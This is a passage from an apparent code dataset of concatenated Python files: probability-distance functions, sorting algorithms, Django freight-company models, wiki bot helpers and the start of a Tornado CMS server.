prob2 = [p / prob2_norm for p in prob2]
middle = [(prob1[idx] + prob2[idx]) / 2 for idx in range(len(prob1))]
return 0.5 * (relative_entropy(prob1, middle) + relative_entropy(prob2, middle))
def Hellinger_Distince(prob1, prob2):
'''
    :desc Hellinger distance, a measure of similarity between probability distributions
:param prob1:
:param prob2:
:return:
'''
if len(prob1) != len(prob2):
raise ValueError("input should be the same length")
norm2 = math.sqrt(sum([(math.sqrt(prob1[idx]) - math.sqrt(prob2[idx])) ** 2 for idx in range(len(prob1))]))
return 1 / math.sqrt(2) * norm2
def isOdds(num):
'''
    :desc parity check: returns True if num is odd
    :param num: a number
:return:
'''
return True if int(num) & 1 else False
|
999,329 | 265270281c1f11b1e56393b76b1638fee3d8136b | # Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains some helper methods and classes used across other packages
in Neptune.
"""
import importlib
import json
import pkgutil
import tornado
def list_submodules(package, recursive=True):
"""
Recursively (optional) find the submodules from a module or directory
Args:
package (str or module): Root module or directory to load submodules from
recursive (bool, optional): Recursively find. Defaults to True.
Returns:
array: array containing module paths that can be imported
"""
if isinstance(package, str):
package = importlib.import_module(package)
results = []
for _loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + '.' + name
results.append(full_name)
if recursive and is_pkg:
results.extend(list_submodules(full_name))
return results
def remove_prefix(text, prefix):
"""
Removes the prefix string from the text
Args:
text (str): The base string containing the prefixed string
prefix (str): Prefix to remove
Returns:
str: the base string with the prefix removed
"""
if text.startswith(prefix):
return text[len(prefix):]
return text
class DummyClass(object):
"""
This dummy class is used to hold attributes when destroying REST endpoints
in Tornado (server.py, DestructServiceHandler). There's no Tornado API for
this and the code from inside Tornado to do this expects an object
containing the request.
"""
pass
# https://stackoverflow.com/a/15721641
class MultiDimensionalArrayEncoder(json.JSONEncoder):
"""
This JSON encoder transforms tuples (which are not JSON serializable) into
arrays with a '__tuple__' key added. Then, when the JSON object is received,
it can be parsed with the hinted_tuple_hook below to reconstruct the tuple.
"""
def encode(self, obj):
"""
The base encode method of the JSON encoder is called with one additional
hook
"""
def hint_tuples(item):
"""
If the object to be serialized is a tuple, or contains tuples,
replace tuples with a dictionary that can be reconstructed on
the receiver
Args:
self (object): Object that will be JSON serialized
Returns:
object: Object without tuples
"""
if isinstance(item, tuple):
return {'__tuple__': True, 'items': item}
if isinstance(item, list):
return [hint_tuples(e) for e in item]
if isinstance(item, dict):
return {key: hint_tuples(value) for key, value in item.items()}
return item
return super(MultiDimensionalArrayEncoder, self).encode(hint_tuples(obj))
def hinted_tuple_hook(obj):
"""
This hook can be passed to json.load* as a object_hook. Assuming the incoming
JSON string is from the MultiDimensionalArrayEncoder, tuples are marked
and then reconstructed into tuples from dictionaries.
Args:
obj (object): Object to be parsed
Returns:
object: Object (if it's a tuple dictionary, returns a tuple)
"""
if '__tuple__' in obj:
return tuple(obj['items'])
return obj
def cancel_async_tasks():
"""
Cancels pending tasks and closes the IO loop, which is needed in Python 3.
This method is provided for Py2 compatibility and just closes the loop
"""
tornado.ioloop.IOLoop.instance().stop()
|
999,330 | 2b0574b78cf373cf83da044adc9027dc88de5cfe | input()
s = input()
while s != "___________":
s = s[2:-1]
tmp = 64
tmp2 = 0
for c in s:
if c == "o":
tmp2 += tmp
tmp //= 2
if c == ".":
tmp *= 2
# print(tmp2)
print(chr(tmp2),end="")
s = input() |
999,331 | d743f6f3174e0d4e6a9f08ddc8e1bf3679404658 | import numpy as np
class item():
def __init__(self, row_length, row1, row2, result):
self.row1 = row1
self.row2 = row2
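        # flatten the (row1, row2) pair into a single linear index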
self.id = row_length*row1 + row2
self.result = np.array(result)
|
999,332 | bdcb77b7b75a8d0ad8b2c440d06e8d634b2bc5b8 | from pie.main import entry_point
__author__ = 'sery0ga'
#from rpython.jit.codewriter.policy import JitPolicy
def target(driver, args):
driver.exe_name = 'pie'
return entry_point, None
def jitpolicy(driver):
from rpython.jit.codewriter.policy import JitPolicy
return JitPolicy()
|
999,333 | 819d221cbae580f13071cabf0c98317418aa084b | from random import choice
# These variables are used to count the comparisons
# They are accessed globally in each sort function
quickComparisons = 0
mergeComparisons = 0
selectionComparisons = 0
insertionComparisons = 0
def swap(Arr, j, i):
tempVar = Arr[j]
Arr[j] = Arr[i]
Arr[i] = tempVar
return(Arr)
def selectionSort(A):
global selectionComparisons # Used to count the number of comparisons
n = len(A)
for q in range(0, n-1):
smallPos = q
for x in range(q+1, n):
# Increments comparisons each time one is done, it is before
# the inequality, because the inequality may not always be true.
selectionComparisons += 1
if A[x] < A[smallPos]:
smallPos = x
A = swap(A,q,smallPos) # Calls the swap function
return(A) # Returns tuple of the sorted list and # of comps
def merge(left, right):
global mergeComparisons
sortedList=[] # Array used to store the sorted list
i,j=0,0
while i<len(left) and j<len(right): # Ensures we dont go out of list
mergeComparisons +=1
if left[i] < right[j]: # Comparing the unitary lists
sortedList.append(left[i])
i+=1 # Moves to next element in list
else:
sortedList.append(right[j])
j+=1
sortedList+=left[i:]
sortedList+=right[j:]
return (sortedList)
def mergeSort(A):
n = len(A)
if (n <= 1):
return(A)
splitPoint = int(n/2)
# Defines left as a list with everything up to the splitpoint
left = mergeSort(A[:splitPoint])
right = mergeSort(A[splitPoint:])
return(merge(left,right))
def insertionSort(A):
global insertionComparisons # Comparison global variable access
for i in range(0,len(A)):
key = A[i]
j = i-1
while j>=0 and key < A[j]: # Waits until key is greater than A[j]
insertionComparisons +=1
A[j+1] = A[j]
j -= 1
A[j+1] = key # Inserts the value
return(A)
def quickSort(A):
global quickComparisons
left = []
pivotList = []
right = []
if (len(A) <= 1):
return(A)
else:
pivotPoint = choice(A)
# The block below iterates over the lists and
#chooses which partition values belong in
for i in A:
quickComparisons +=2
if i < pivotPoint:
left.append(i)
elif i > pivotPoint:
right.append(i)
else:
pivotList.append(i)
leftSide = quickSort(left)
rightSide = quickSort(right)
return(leftSide + pivotList + rightSide)
def main():
# Reads magicitems file
f = open('magicitems.txt',"r")
magicitems = list(f)
    f.close()
magicitems = [x.strip() for x in magicitems]
magicitems = [x.lower() for x in magicitems]
magicitems = [x.replace(' ','') for x in magicitems]
    a = magicitems
    b = magicitems
sortingCalls =[insertionSort, selectionSort, mergeSort, quickSort]
for algorithm in sortingCalls:
        algorithm(a)
    # Note: insertionSort and selectionSort sort the list in place, so the
    # algorithms later in sortingCalls receive an already-sorted list
print("---------------------------------------------")
print("Sorting Algorithm | Comparisons ")
print("-------------------|-------------------------")
print("Insertion Sort: "," | ", insertionComparisons)
print("Quick Sort: "," | ", quickComparisons)
print("Merge Sort: "," | ", mergeComparisons)
print("Selection Sort:"," | ", selectionComparisons)
print("---------------------------------------------")
main()
|
999,334 | 46c55ac1e272f0d8bd2ed41d543c0dc69f0e73ea | #!/usr/bin/python
#
# (C) Legoktm 2008-2011, MIT License
#
import wikipedia, pagegenerators, catlib
import re, sys
from wikipedia import *
#status updater
#syntax: legoktm.newstatus("Status", "User:Username/Status", "[y]es/[n]o prompt)
site = wikipedia.getSite()
def newstatus(status, page, prompt):
site = wikipedia.getSite()
statuspage = wikipedia.Page(site, page)
print "Current status is " + statuspage.get()
if statuspage.get() != status:
if prompt == "y":
ask = raw_input("Should we update your status to " + status + "? [y]es, [n]o ")
if ask == "y":
summary = 'Updating my status'
statuspage.put(status, summary)
else:
summary = 'Updating my status'
statuspage.put(status, summary)
else:
print "Don't have to update status,\nas it already is " + status
#shortcut for raw_input()
#syntax: legoktm.ri(text)
def ri(text):
return raw_input(text)
#uploads source code to wiki
#variables: wikipage=page to upload code to and code=file code is in
#syntax: legoktm.upload(wikipage, code)
def upload(wikipage, code):
prompt = raw_input("Should we update the code? [y]es, [n]o " )
if prompt == "y":
summary = 'Updating source'
scriptpage = wikipedia.Page(site, wikipage)
file = open(code, 'r')
text = file.read()
file.close()
text = '<source lang="python">\n' + text + '</sou' + 'rce>' # Split to confuse MW parser
if scriptpage.get() != text:
scriptpage.put(text, summary)
else:
print "Source not updated"
#adds certain text to a log page
#syntax: leogktm.log(pagecreated, logpage, newtext)
#input newtext as a variable
def log(page, log, newtext):
logpage = Page(site, log)
newtext = newtext + logpage.get()
summary = 'Adding ' + page + ' to log'
print summary
logpage.put(newtext, summary)
print "Done adding " + page + " to log."
#converts number to month
#needs to use a variable
#syntax: var = legoktm.month(var)
def month(var):
    months = {"1": "January", "2": "February", "3": "March",
              "4": "April", "5": "May", "6": "June",
              "7": "July", "8": "August", "9": "September",
              "10": "October", "11": "November", "12": "December"}
    if var in months:
        var = months[var]
    else:
        print "There is no month with the number of " + var
    print var
    return var
#checks if a certain page exists, if it does, wikilink it
#syntax: legoktm.pagecheck("pagename")
def pagecheck(name):
site = wikipedia.getSite()
wppage = wikipedia.Page(site, name)
if wppage.exists() == True:
name = "[[" + name + "]]"
print name + " exists."
else:
print name + "does not exist."
return name
#unicodify
def unicodify(text):
if not isinstance(text, unicode):
return text.decode('utf-8')
return text
def wikilink(link):
link = "[[" + link + "]]"
return link
def delink(link):
import re
link = re.compile(r'\[\[(.*?)\]\]', re.IGNORECASE).sub(r'\1', str(link))
return link
def templink(link):
link = '{{' + link + '}}'
return link
def delinktemp(link):
import re
link = re.compile(r'\{\{(.*?)\}\}', re.IGNORECASE).sub(r'\1', str(link))
return link
def addsection(page, content, summary):
site = wikipedia.getSite()
wppage = wikipedia.Page(site, page)
text = wppage.get()
text = text + content
wikipedia.showDiff(wppage.get(), text)
    try:
        wppage.put(text, summary, minorEdit=False)
    except wikipedia.NoPage:
        wppage.put(text, summary, minorEdit=False)
    except wikipedia.IsRedirectPage:
        return
    except Exception, e:
        print "ERROR: Exception was raised during writing"
        print e
        sys.exit()
|
999,335 | 49963945d07369c6f69ace5648b9d6da99edee62 | # Generated by Django 3.0.3 on 2020-10-05 05:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('agreement', '0028_localarea'),
]
operations = [
migrations.AlterField(
model_name='site',
name='site_extension',
            field=models.IntegerField(blank=True, null=True),
),
]
|
999,336 | acdfd063629a221fbed1df8e95840be7ce994133 | """ This is a simple programme on Classes
and Objects : Initializer Method in Py3"""
class Point:
def __init__(self, x, y, z):
self.assign(x, y, z)
def assign(self, x, y, z):
self.x = x
self.y = y
self.z = z
def printPoint(self):
print(self.x, self.y, self.z)
p1 = Point(2, 3, 5)
p1.printPoint()
p2 = Point(6, 2, -4)
p2.printPoint()
# It's Output is :
# 2 3 5
# 6 2 -4
|
999,337 | 37d093a9d1d3e7a63c66c4fa4ee396f04d4485e5 | from django.db import models
from django.db.models import DEFERRED
from django.contrib.auth.models import User
from django_countries.fields import CountryField
class FreightCompany(models.Model):
def __str__(self):
return self.name
@classmethod
def from_db(cls, db, field_names, values):
# Default implementation of from_db() (subject to change and could
# be replaced with super()).
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [
values.pop() if f.attname in field_names else DEFERRED
for f in cls._meta.concrete_fields
]
instance = cls(*values)
instance._state.adding = False
instance._state.db = db
# customization to store the original field values on the instance
instance._loaded_values = dict(zip(field_names, values))
return instance
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=20, default='')
location = models.CharField(max_length=100, default='')
FREIGHT_TYPES = (('AIR', 'Air-Freight'),
('ROAD', 'Road-Freight'),
('RAIL', 'Railway-Freight'),
('SHIP', 'Sea-Freight'),
)
type = models.CharField(choices=FREIGHT_TYPES, default='', max_length=100)
owner = models.ForeignKey(User, related_name='freightcompany', on_delete=models.SET_NULL, null=True, blank=True)
has_own_vehicles = models.BooleanField(default=True)
text = 'To select multiple destinations. Hold CTRL!'
rating = models.PositiveSmallIntegerField(blank=True, null=True)
destinations = CountryField(multiple=True, blank_label='(select country)', blank=True, help_text=text)
revenue = models.PositiveIntegerField()
founding_year = models.DateField(help_text='Date Format=1920-2-10')
    logo = models.ImageField(blank=True)  # original assigned the field class itself; it must be instantiated
class ManagerAirFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerAirFreight, self).get_queryset().filter(
type='AIR')
class ManagerRoadFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerRoadFreight, self).get_queryset().filter(
type='ROAD')
class ManagerRailwayFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerRailwayFreight, self).get_queryset().filter(
type='RAIL')
class ManagerSeaFreight(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.type != self._loaded_values['type']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerSeaFreight, self).get_queryset().filter(
type='SHIP')
class AirFreightCompany(FreightCompany):
objects = ManagerAirFreight()
class Meta:
proxy = True
class RoadFreightCompany(FreightCompany):
objects = ManagerRoadFreight()
class Meta:
proxy = True
class RailwayFreightCompany(FreightCompany):
objects = ManagerRailwayFreight()
class Meta:
proxy = True
class SeaFreightCompany(FreightCompany):
objects = ManagerSeaFreight()
class Meta:
proxy = True
class Vehicle(models.Model):
def __str__(self):
return self.name
@classmethod
def from_db(cls, db, field_names, values):
# Default implementation of from_db() (subject to change and could
# be replaced with super()).
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [
values.pop() if f.attname in field_names else DEFERRED
for f in cls._meta.concrete_fields
]
instance = cls(*values)
instance._state.adding = False
instance._state.db = db
# customization to store the original field values on the instance
instance._loaded_values = dict(zip(field_names, values))
return instance
VEHICLE_TYPES = (('ROAD', 'Truck'),
('AIR', 'Airplane'),
('RAIL', 'Train'),
('SEA', 'Ship'),
)
types = models.CharField(choices=VEHICLE_TYPES, default='', max_length=100)
name = models.CharField(default='', max_length=100)
occupied = models.BooleanField(default=False)
location = models.CharField(default='', max_length=200)
donedate = models.DateField(default='1980-02-01')
builtdate = models.DateField(default='1980-02-01')
length = models.PositiveSmallIntegerField(null=True)
maxWeight = models.PositiveIntegerField(default=100)
owner = models.ForeignKey(User,related_name='vehicles', on_delete=models.SET_NULL, null=True, blank=True)
driver = models.ForeignKey('Driver', related_name='driver', on_delete=models.SET_NULL, null=True, blank=True)
goods = models.CharField(max_length=10, blank=True)
class ManagerPlane(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerPlane, self).get_queryset().filter(
types='AIR')
def create(self, **kwargs):
kwargs.update({'types': 'AIR'})
return super(ManagerPlane, self).create(**kwargs)
class ManagerTruck(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerTruck, self).get_queryset().filter(
types='ROAD')
def create(self, **kwargs):
kwargs.update({'types': 'ROAD'})
return super(ManagerTruck, self).create(**kwargs)
class ManagerTrain(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
def get_queryset(self):
return super(ManagerTrain, self).get_queryset().filter(
types='RAIL')
def create(self, **kwargs):
kwargs.update({'types': 'RAIL'})
return super(ManagerTrain, self).create(**kwargs)
class ManagerShip(models.Manager):
def save(self, *args, **kwargs):
if not self._state.adding and (
self.types != self._loaded_values['types']):
raise ValueError("Updating type is not allowed")
super().save(*args, **kwargs)
    def get_queryset(self):
        return super(ManagerShip, self).get_queryset().filter(
            types='SEA')  # 'SEA' is the stored value in VEHICLE_TYPES; 'Ship' is only the display label
    def create(self, **kwargs):
        kwargs.update({'types': 'SEA'})
        return super(ManagerShip, self).create(**kwargs)
class Train(Vehicle):
objects = ManagerTrain()
company = models.ForeignKey(RailwayFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'RAIL'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'RAIL'}, related_name='+')
class Plane(Vehicle):
objects = ManagerPlane()
company = models.ForeignKey(AirFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'AIR'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'AIR'},related_name='+')
class Ship(Vehicle):
objects = ManagerShip()
company = models.ForeignKey(SeaFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'SEA'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'SEA'}, related_name='+')
class Truck(Vehicle):
objects = ManagerTruck()
licenseplate = models.CharField(max_length=10)
km_driven = models.PositiveIntegerField()
permission_until = models.DateField()
emission_class = models.CharField(max_length=5)
company = models.ForeignKey(RoadFreightCompany, on_delete=models.CASCADE, default='')
features = models.ManyToManyField('Features', limit_choices_to={'vehicle': 'ROAD'})
permissions = models.ManyToManyField('Permissions', limit_choices_to={'vehicle': 'ROAD'}, related_name='+')
class Features(models.Model):
def __str__(self):
return self.name
VEHICLE_TYPES = (('ROAD', 'Truck'),
('AIR', 'Airplane'),
('RAIL', 'Train'),
('SEA', 'Ship'),
)
vehicle = models.CharField(choices=VEHICLE_TYPES, default='', max_length=100)
name = models.CharField(max_length=100, default='')
description = models.TextField(max_length=100, blank=True)
class Permissions(Features):
class Meta:
proxy = True
class Driver(models.Model):
def __str__(self):
return self.name
id = models.AutoField(primary_key=True)
company = models.ForeignKey(FreightCompany, on_delete=models.CASCADE, default='')
name = models.CharField(max_length=200)
gebd_dat = models.DateField()
rating = models.PositiveSmallIntegerField()
driving_license_classes = models.CharField(max_length=250)
work_experience = models.PositiveSmallIntegerField()
available = models.BooleanField(default=True)
|
999,338 | 92dc6e9f3e6bd324c2d50376d531d02e80a2061c | # Generated by Django 2.1.3 on 2018-11-22 09:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exchange', '0001_initial'),
('simulation', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Portfolio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('start_date', models.DateField()),
('end_date', models.DateField(blank=True, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='WeightPortfolio',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weight', models.PositiveIntegerField(default=1)),
('portfolio', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='simulation.Portfolio')),
('ticker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='exchange.Ticker')),
],
),
migrations.AddField(
model_name='portfolio',
name='tickers',
field=models.ManyToManyField(through='simulation.WeightPortfolio', to='exchange.Ticker'),
),
]
|
999,339 | 1d592de64d6925892483627a5eed54cfb3a4d9a5 | '''
cms : content manager system
manager group
manager account
manager message
'''
from __future__ import absolute_import, division, print_function, with_statement
# Tornado framework
import tornado.web
HTTPError = tornado.web.HTTPError
import tornado.ioloop
import tornado.auth
import tornado.escape
import tornado.options
import tornado.locale
import tornado.util
import tornado.httpclient
import tornado.gen
import tornado.httputil
from tornado.util import errno_from_exception
from tornado.platform.auto import set_close_exec
from tornado.options import define, options
define('port', default=8180, help='running on the given port', type=int)
import errno
import os
import sys
# import re
# import struct
# import hashlib
import socket
# import collections
import functools
# import time
# import datetime
import logging
# import xml.etree.ElementTree as ET
# Mako template
import mako.lookup
import mako.template
# from MySQLdb import (IntegrityError)
import user_agents
logger = None
import util
_now = util.now
import settings
import manage
import ueditor_config
# json_encoder = util.json_encoder
json_encoder = util.json_encoder2
json_decoder = util.json_decoder
CURRENT_PATH = os.path.abspath(os.path.dirname(__file__))
TEMPLATE_PATH = settings['cms_path']
if not os.path.exists(TEMPLATE_PATH):
os.mkdir(TEMPLATE_PATH)
# if IMAGE_PATH not existed, mkdir it
UPLOAD_IMAGE_PATH = os.path.join(TEMPLATE_PATH, 'fu_images')
UF_IMAGE_PREFIX = '/fu_images/'
if not os.path.exists(UPLOAD_IMAGE_PATH):
os.mkdir(UPLOAD_IMAGE_PATH)
# MOBILE_PATH = os.path.join(TEMPLATE_PATH, 'm')
UEDITOR_IMAGE_PATH = os.path.join(TEMPLATE_PATH, 'ue_images')
UE_IMAGE_PREFIX = '/ue_images/'
OK = {'Code':200, 'Msg':'OK'}
_GROUPS_ = {}
# _SECTION_ = {}
class Application(tornado.web.Application):
'''
Web application class.
Redefine __init__ method.
'''
def __init__(self):
handlers = [
(r'/account', AccountHandler),
(r'/manager/?(.*)$', ManagerHandler),
# group interface
(r'/group/?(.*)$', GroupsHandler),
# message interface
(r'/message/section/?(.*)$', SectionHandler),
(r'/message/?(.*)$', MessageHandler),
#
(r'/ue$', UeditorHandler),
# static resource handler
# add support for php
(r'/(.*\.(?:css|jpg|png|js|ico|json|php|gif|swf))$', tornado.web.StaticFileHandler,
{'path':TEMPLATE_PATH}),
(r'/image/?(.*)$', ImageHandler),
(r'/index.html', MainHandler),
(r'/(.+\.html)', PageHandler),
(r'/', MainHandler),
]
settings = {
'cookie_secret':util.sha1('bidong').hexdigest(),
'static_path':TEMPLATE_PATH,
'static_url_prefix':'images/',
'debug':False,
'autoreload':True,
'autoescape':'xhtml_escape',
'i18n_path':os.path.join(CURRENT_PATH, 'resource/i18n'),
# 'login_url':'',
'xheaders':True, # use headers like X-Real-IP to get the user's IP address instead of
            # attributing all traffic to the balancer's IP address.
}
super(Application, self).__init__(handlers, **settings)
class BaseHandler(tornado.web.RequestHandler):
'''
BaseHandler
override class method to adapt special demands
'''
LOOK_UP = mako.lookup.TemplateLookup(directories=[TEMPLATE_PATH, ],
module_directory='/tmp/cms/mako',
output_encoding='utf-8',
input_encoding='utf-8',
encoding_errors='replace')
# LOOK_UP_MOBILE = mako.lookup.TemplateLookup(directories=[MOBILE_PATH, ],
# module_directory='/tmp/bidong/mako_mobile',
# output_encoding='utf-8',
# input_encoding='utf-8',
# encoding_errors='replace')
RESPONSES = {}
RESPONSES.update(tornado.httputil.responses)
def initialize(self):
'''
'''
pass
# def on_finish(self):
# '''
# allow other sites access this site
# '''
# self.set_header('Access-Control-Allow-Origin', '*')
def get_arguments(self, name, strip=True):
assert isinstance(strip, bool)
return self._get_arguments(name, self.request.arguments, strip)
def _get_arguments(self, name, source, strip=True):
values = []
for v in source.get(name, []):
if isinstance(v, basestring):
v = self.decode_argument(v, name=name)
if isinstance(v, tornado.escape.unicode_type):
v = tornado.web.RequestHandler._remove_control_chars_regex.sub(' ', v)
if strip:
v = v.strip()
values.append(v)
return values
def render_string(self, filename, **kwargs):
'''
Override render_string to use mako template.
Like tornado render_string method, this method also
pass request handler environment to template engine
'''
try:
# if not self.is_mobile():
template = self.LOOK_UP.get_template(filename)
# else:
# template = self.LOOK_UP_MOBILE.get_template(filename)
env_kwargs = dict(
handler = self,
request = self.request,
# current_user = self.current_user
locale = self.locale,
_ = self.locale.translate,
static_url = self.static_url,
xsrf_form_html = self.xsrf_form_html,
reverse_url = self.application.reverse_url,
)
env_kwargs.update(kwargs)
return template.render(**env_kwargs)
except:
from mako.exceptions import RichTraceback
tb = RichTraceback()
for (module_name, line_no, function_name, line) in tb.traceback:
print('File:{}, Line:{} in {}'.format(module_name, line_no, function_name))
print(line)
logger.error('Render {} failed, {}:{}'.format(filename, tb.error.__class__.__name__, tb.error),
exc_info=True)
raise HTTPError(500, 'Render page failed')
def render(self, filename, **kwargs):
'''
Render the template with the given arguments
'''
template = TEMPLATE_PATH
# if self.is_mobile():
# template = MOBILE_PATH
if not os.path.exists(os.path.join(template, filename)):
raise HTTPError(404, 'File Not Found')
self.finish(self.render_string(filename, **kwargs))
def set_status(self, status_code, reason=None):
'''
        Set custom error reason
'''
self._status_code = status_code
self._reason = 'Unknown Error'
if reason is not None:
self._reason = tornado.escape.native_str(reason)
else:
try:
self._reason = self.RESPONSES[status_code]
except KeyError:
raise ValueError('Unknown status code {}'.format(status_code))
def write_error(self, status_code, **kwargs):
'''
Customer error return format
'''
if self.settings.get('Debug') and 'exc_info' in kwargs:
self.set_header('Content-Type', 'text/plain')
import traceback
for line in traceback.format_exception(*kwargs['exc_info']):
self.write(line)
self.finish()
else:
self.render_json_response(Code=status_code, Msg=self._reason)
# self.render('error.html', Code=status_code, Msg=self._reason)
def render_json_response(self, **kwargs):
'''
Encode dict and return response to client
'''
# self.set_header('Access-Control-Allow-Origin', '*')
origin = self.request.headers.get('Origin', '')
if origin and origin in settings['sites']:
self.set_header('Access-Control-Allow-Origin', origin)
callback = self.get_argument('callback', None)
# check should return jsonp
if callback:
self.set_status(200, kwargs.get('Msg', None))
self.finish('{}({})'.format(callback, json_encoder(kwargs)))
else:
self.set_status(kwargs['Code'], kwargs.get('Msg', None))
self.set_header('Content-Type', 'application/json')
self.finish(json_encoder(kwargs))
def is_mobile(self):
self.agent_str = self.request.headers.get('User-Agent', '')
if not self.agent_str:
return False
if 'MicroMessenger' in self.agent_str:
# from weixin client
return True
self.check_app()
if hasattr(self, 'is_mobile'):
return self.is_mobile
agent = user_agents.parse(self.agent_str)
return agent.is_mobile
def check_app(self):
'''
'''
name = '\xe8\x87\xaa\xe8\xb4\xb8\xe9\x80\x9a'
if name in self.agent_str:
self.is_mobile = True
# if self.agent_str.find('Android'):
# self.agent['os'] = 'Android'
# else:
# self.agent['os'] = 'IOS'
def _parse_body(method):
'''
        The framework only parses body content into arguments
        for POST- and PUT-style requests.
        With this decorator, parameters can be sent in the URI or
        in the body regardless of the request method (including 'GET' and 'DELETE').
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
content_type = self.request.headers.get('Content-Type', '')
# parse json format arguments in request body content
if content_type.startswith('application/json') and self.request.body:
arguments = json_decoder(tornado.escape.native_str(self.request.body))
for name, values in arguments.iteritems():
self.request.arguments.setdefault(name, []).extend([values,])
# if isinstance(values, basestring):
# values = [values, ]
# elif isinstance(values, dict):
# values = [values, ]
# else:
# values = [v for v in values if v]
# if values:
# self.request.arguments.setdefault(name, []).extend(values)
# parse body if request's method not in (PUT, POST, PATCH)
if self.request.method not in ('PUT', 'PATCH', 'POST'):
if content_type.startswith('application/x-www-form-urlencode'):
arguments = tornado.escape.parse_qs_bytes(
tornado.escape.native_str(self.request.body))
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values:
self.request.arguments.setdefault(name, []).extend(values)
elif content_type.startswith('multipart/form-data'):
fields = content_type.split(';')
for field in fields:
k, sep, v = field.strip().partition('=')
if k == 'boundary' and v:
tornado.httputil.parse_multipart_form_data(
tornado.escape.utf8(v), self.request.body,
self.request.arguments, self.request.files)
break
else:
logger.warning('Invalid multipart/form-data')
return method(self, *args, **kwargs)
return wrapper
def _trace_wrapper(method):
'''
Decorate method to trace logging and exception.
        Remarks: to make sure exceptions are caught and progress is logged,
        _trace_wrapper should be the outermost decorator when a method
        is decorated by multiple decorators.
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
try:
logger.info('<-- In %s: <%s> -->', self.__class__.__name__, self.request.method)
return method(self, *args, **kwargs)
except HTTPError:
logger.error('HTTPError catch', exc_info=True)
raise
except KeyError:
if self.application.settings.get('debug', False):
print(self.request)
logger.warning('Arguments error', exc_info=True)
raise HTTPError(400)
except ValueError:
if self.application.settings.get('debug', False):
print(self.request)
logger.warning('Arguments value abnormal', exc_info=True)
raise HTTPError(400)
except Exception:
# Only catch normal exceptions
# exclude SystemExit, KeyboardInterrupt, GeneratorExit
logger.error('Unknow error', exc_info=True)
raise HTTPError(500)
finally:
logger.info('<-- Out %s: <%s> -->\n\n', self.__class__.__name__, self.request.method)
return wrapper
def _check_token(method):
'''
check user & token
'''
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
user = self.get_argument('manager')
if not user:
raise HTTPError(400, reason='account can\'t be null')
token = self.get_argument('token')
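        # token is expected as '<hash>|<expiry>'; recompute the hash from the
        # user and expiry and compare to detect tampering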
token, expired = token.split('|')
token2 = util.token2(user, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
# check expired?
return method(self, *args, **kwargs)
return wrapper
def _check_groups_(user):
'''
If user in _GROUPS_ return it's group values
else not in, query
if existed, return group
else:
raise 404
'''
if user in _GROUPS_:
return _GROUPS_[user]
# query group info
manager = manage.get_manager(user)
if not manager:
raise HTTPError(404, reason='Can\'t found manager')
groups = int(manager['groups'])
_GROUPS_[user] = groups
return groups
# def _check_section_(value):
# '''
# reponse
# '''
# value = int(value)
# if value in _SECTION_:
# return _SECTION_[value]
#
# section = manage.get_section(value)
# if not section:
# return 'Unknown'
#
# _SECTION_[value] = section['name']
# return section['name']
class MainHandler(BaseHandler):
'''
'''
@_trace_wrapper
def get(self):
manager = self.get_argument('manager', '')
if manager:
token = self.get_argument('token')
token, expired = token.split('|')
token2 = util.token2(manager, expired)
if token != token2:
raise HTTPError(400, reason='Abnormal token')
self.render('index.html', groups=_check_groups_(manager))
else:
